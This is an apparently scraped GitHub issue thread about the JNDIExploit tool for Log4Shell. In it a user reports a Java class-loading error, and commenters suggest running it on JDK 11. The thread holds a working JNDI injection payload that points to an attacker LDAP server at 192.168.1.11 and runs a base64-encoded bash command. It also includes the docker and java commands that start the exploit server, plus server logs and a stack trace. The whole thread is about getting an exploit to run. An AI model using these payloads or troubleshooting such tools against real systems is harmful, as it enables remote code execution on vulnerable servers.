JNDIExploit-1 java.lang.NoClassDefFoundError

docker run -it
-p 1389:1389
-e LDAP_PORT=1389
-p 80:80
-e HTTP_PORT=80
jndiexploit

${jndi:ldap://192.168.1.11:1389/Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ=}

[+] Received LDAP Query: Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ=
[+] Paylaod: command
[+] Command: bash -i touch /tmp/tttt
[+] Sending LDAP ResourceRef result for Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ= with basic remote reference payload
Exception in thread "LDAPListener client connection reader for connection from 172.17.0.1:62830 to 172.17.0.3:1389" java.lang.NoClassDefFoundError: Could not initialize class com.feihong.ldap.utils.Cache
	at com.feihong.ldap.template.CommandTemplate.cache(CommandTemplate.java:28)
	at com.feihong.ldap.controllers.BasicController.sendResult(BasicController.java:37)
	at com.feihong.ldap.LdapServer.processSearchResult(LdapServer.java:92)
	at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
	at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
	at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
Caused by: java.lang.ExceptionInInitializerError: Exception java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x6d6e41aa) cannot access class com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.runtime to unnamed module @0x6d6e41aa [in thread "LDAPListener client connection reader for connection from 172.17.0.1:62694 to 172.17.0.3:1389"]
	at java.base/java.lang.ClassLoader.defineClass1(Native Method)
	at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1013)
	at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:150)
	at java.base/jdk.internal.loader.BuiltinClassLoader.defineClass(BuiltinClassLoader.java:862)
	at java.base/jdk.internal.loader.BuiltinClassLoader.findClassOnClassPathOrNull(BuiltinClassLoader.java:760)
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClassOrNull(BuiltinClassLoader.java:681)
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:639)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:188)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:521)
	at com.feihong.ldap.utils.Cache.<clinit>(Cache.java:19)
	... 6 more

Dec 18 '21 11:12 nmweizi

You should use some older JDK image i.e. openjdk:11-jdk-slim-bullseye

Nov 21 '22 20:11 niewiemek

I had a very similar problem. I fix that using "java-11-openjdk-amd6". It seems like there is a problem with recent java versions. I use "java-11-openjdk-amd6" and it works. I will describe the steps in case it helps someone:

Firts you need to set an alias to use java. You can set aliases on your .zshrc as follow: alias java11='/usr/lib/jvm/java-11-openjdk-amd64/bin/java' alias java17='/usr/lib/jvm/java-17-openjdk-amd64/bin/java' In this case I set two aliases, one for java11 and one for java17
Then you have to run tho follow comand: souce /home/kali/.zshrc, to update your aliases
After that you can use java11 as follow: java11 -jar JNDIExploit-1.2-SNAPSHOT.jar -i -p 8888

Good luck.

Aug 19 '23 15:08 Jhanthony17

JNDIExploit-1 JNDIExploit-1 copied to clipboard

java.lang.NoClassDefFoundError

JNDIExploit-1
JNDIExploit-1 copied to clipboard